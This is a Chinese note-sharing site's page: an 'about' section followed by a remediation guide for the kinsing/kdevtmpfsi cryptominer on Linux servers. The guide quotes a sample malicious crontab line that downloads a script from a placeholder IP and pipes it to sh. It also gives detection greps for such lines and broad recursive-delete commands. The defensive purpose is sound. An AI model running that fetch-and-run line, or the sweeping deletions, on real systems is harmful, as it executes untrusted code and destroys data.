笔记
0工具
0此页用于记录用户反馈问题后的每一次改进
关于
“写笔记”支持四种格式——Word 文档、Excel 表格、Markdown、纯文本,起稿或二次编辑时都能随时切换,同一篇笔记想用哪种形态来记,都由你说了算。
md、txt、csv、json 这类纯文本则原样载入,不做多余加工。拿一张现成的表倒进来、改几笔、再导出去,等于白用一台免费的格式转换器。
要带走就在右上角点“下载”,可导出 PDF、Word、Markdown、Excel、TXT 等格式;列表卡片“⋯”菜单里,也有同样的下载入口。
在“工具”页点“+ 上传工具”即可发布:填好名称与链接,再用 Markdown 把使用方法写清楚——能解决什么问题、怎么装、怎么用,比堆介绍实在。
要分发安装包就一并上传压缩包(ZIP、RAR、7Z、TAR.GZ,最大 35MB),别人在详情页一键下载;只放链接不带附件也可以。
工具按大家的收藏热度排序,好用的自然会被顶上来。发布后可在详情页或卡片菜单里编辑、下架。
写笔记时勾上“隐藏”,这篇就只存在于你自己的账号里:不进列表、不进搜索、不上首页精选,也不会出现在任何公开的页面,链接发给别人同样打不开。
适合放密码、草稿、日记这类只给自己看的内容;想公开,去“发布”打开它,把“隐藏”的勾去掉再保存,之后编辑会默认保持原状态,不会悄悄变回公开。
不想公开、只想临时给人看:点“分享”生成一条带密码和有效期的链接,到期自动失效,你也能随时撤销。
你的内容会同时保存在多个副本上,系统定期做备份与完整性校验,再配合异地容灾机制:就算某台机器出问题,数据也不会丢,可以长期放心存放;特别重要的资料,仍建议你另外再留一份备份。
全站跑在容器化、模块化的现代架构上,更新、部署、回滚都很快,扩展性和稳定性都按长期运营的标准来设计(Built for reliability, designed to scale)。
这个网站最早只是一个人的笔记仓库,后来慢慢长成现在的知识中枢。设计上很克制——没有广告、没有追踪、没有推荐算法,只是干干净净地存放一些东西;既然做好了,就公开出来,万一有人用得上呢。
不做大而全,不做平台梦,保持简单、保持克制、保持好奇。所有内容都由用户贡献、由用户维护:不会突然冒出付费墙,不会在角落塞广告位,也不会把你的数据卖给第三方。
产品会持续迭代,站内日志页记录着每一次改动,改了什么都有迹可循;想了解这个站是怎么一步步走到今天的,翻翻日志就能看到来龙去脉。
如果在这里看到涉嫌违规的内容,点对应卡片右侧的“举报”按钮就能提交,我们会尽快核实处理;也谢谢你花一点时间,一起把这里维护干净。
趋势
服务器 CPU 100%?kill 掉的挖矿进程一分钟又复活——先认识它的"监工"
登录云服务器,top 一看,有个叫 kdevtmpfsi 的进程 CPU 占用快 100%。kill -9 干掉它,不到一分钟又满血复活,CPU 再次拉满。如果你只盯着这个进程杀,永远杀不干净——因为真正的 BOSS 是另一个叫 kinsing 的"监工"进程,它负责看着矿工进程,一死就重启。先杀监工,再杀矿工,顺序错了就是白忙。
第一步:先杀监工 kinsing,再杀矿工 kdevtmpfsi
ps -aux | grep kinsing
kill -9 <kinsing的PID>
ps -aux | grep kdevtmpfsi
kill -9 <kdevtmpfsi的PID>
顺序一定要对:监工死了,矿工被杀后才不会复活。两个都处理完,CPU 应该能掉下来。
第二步:删文件(重点在 /tmp 和 /var/tmp)
挖矿木马特别喜欢藏在临时目录:
rm -rf /tmp/kdevtmpfsi /tmp/kinsing /var/tmp/kinsing
保险起见全局搜一遍:
find / -name kdevtmpfsi -exec rm -rf {} \;
find / -name kinsing -exec rm -rf {} \;
如果删的时候提示 Operation not permitted,说明文件被加了 immutable 属性,先去属性再删:
lsattr /tmp/kdevtmpfsi # 看有没有 i 属性
chattr -i /tmp/kdevtmpfsi # 去掉 immutable
rm -rf /tmp/kdevtmpfsi
第三步:清定时任务——它是复活的遥控器
挖矿木马靠 crontab 持久化,最常见的恶意任务是定时去下载执行脚本,比如:
* * * * * wget -q -O - http://某个IP/spr.sh | sh > /dev/null 2>&1
crontab -l # 看当前用户的定时任务
crontab -e # 把恶意行删掉
crontab -r # 不放心就全清
同时检查系统级 cron 目录:/var/spool/cron/ 下每个用户的文件都要看一遍,root 的更要看。
第四步:查后门和入侵痕迹
netstat -anpt # 看有没有连到可疑 IP 的进程
cat ~/.ssh/authorized_keys # 看有没有不明公钥(被人加了后门钥匙就等着被反复进)
日志溯源(看谁登录过、什么时候开始的):
tail -n 500 /var/log/secure | grep 'Accepted' # CentOS/RedHat
grep 'Accepted' /var/log/auth.log # Ubuntu/Debian
第五步:防再生——给文件占坑加锁(小技巧)
病毒是通过下载脚本覆写文件来再生的,那就把路径先占住、锁死:
echo 123 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
病毒想往这个路径写文件时会失败,这招能挡住一部分靠固定路径复活的样本。
第六步:加固,别清了再中
- SSH 禁密码登录、改用密钥;别再用弱口令。
- SSH 换到高位端口,减少被全网扫描命中。
- 防火墙最小化开放,只放行真需要的端口。
- Docker 容器里也查一遍:这类木马会顺着漏洞打进容器内部。
- 最关键的:找到入侵入口。公网裸奔的未授权服务、老版本 Web 中间件漏洞、弱口令,都是入口。不堵住入口,清了还会再中。
判断范围:CPU 高但能确定不是自己业务导致的,先按上面的顺序过一遍;如果反复杀不净、CPU 又起来,八成还有第二个下载源或后门进程没找出来,回头查 crontab 和 authorized_keys 是最容易漏的。
补充一个容易漏的持久化位置:systemd 用户级服务和 profile 注入
- 除了 crontab,挖矿木马还会往 systemd 塞服务:
systemctl list-unit-files | grep -iE 'kinsing|kdev|tmp|sys',看有没有名字可疑的 unit;再看/etc/systemd/system/和/usr/lib/systemd/system/下新增时间可疑的文件。发现就systemctl disable --now然后删文件、systemctl daemon-reload。 - 登录 shell 启动文件也是藏身处:
~/.bashrc、~/.profile、/etc/profile.d/*.sh里可能被追加了wget|curl ... |sh这类行。grep -nE 'wget|curl|sh' ~/.bashrc ~/.profile /etc/profile.d/*.sh扫一遍,看到可疑的拉取命令就删。 - 杀干净后建议改一遍所有密码和密钥:能进来一次,说明某个凭据已经泄露。SSH 密钥、数据库密码、面板密码全换掉,比光清进程实在。木马常顺手把内网横向渗透的凭据也偷走,别只盯着这一台。
参考出处:
https://cloud.tencent.cn/developer/article/2528720
https://www.cnblogs.com/syjp/p/19593156